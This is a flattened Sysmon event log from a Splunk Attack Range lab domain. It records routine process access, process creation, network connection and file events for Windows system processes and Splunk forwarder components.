07:54:48.858{466BC892-32D3-60E8-770B-00000000CF01}635610232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE9A2193D363998D25F96C6D771AA221,SHA256=4638AE04A325471D2E30C12E4C031C0CE52812FCEE0E2B967065D09C146975B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:48.370{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57297-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:49.788{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA15DFD0DC63081707385AD8B48A7258,SHA256=3BF2C00B92C5A76500C38EF4AFCBE740DDEC72C1423652C2A8729C8A32BDF37B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:49.905{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075428MD5=D64CBEEFE30A8AF64CBCACC44036ADB0,SHA256=753109728F1FBA47A3BE71347227A7971EEF4CD1780E55331D457409ADD61CDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:49.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26A171AD6256F5924C5F71B4D722BD28,SHA256=5078399A426DCACD3CCF8AFA50105B18D2EE2AAED724F9B756792CD5B07EBB45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:50.790{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=926FC993C3227D79A508BE09D5B0FE53,SHA256=937EBEB8802B9D41C083A55AC8C16BE7F17C57F2EC1E5E13C6845D412C9F6934,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.923{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54A-60EB-4E7D-00000000CF01}9408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.921{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.921{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.905{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.905{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.905{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F54A-60EB-4E7D-00000000CF01}9408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.905{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54A-60EB-4E7D-00000000CF01}9408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.906{466BC892-F54A-60EB-4E7D-00000000CF01}9408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:42.761{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51063-false10.0.1.12-8000- 10341000x80000000000000001049784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.523{466BC892-F54A-60EB-4D7D-00000000CF01}88849860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.258{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBC82F77552F7538C160A8C1A6A66633,SHA256=1BC4DA5858E804058FD05BF7879DDD3A48D53AC9FEB58160CA9133CFFE257715,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54A-60EB-4D7D-00000000CF01}8884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F54A-60EB-4D7D-00000000CF01}8884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54A-60EB-4D7D-00000000CF01}8884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.221{466BC892-F54A-60EB-4D7D-00000000CF01}8884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.025{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.025{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 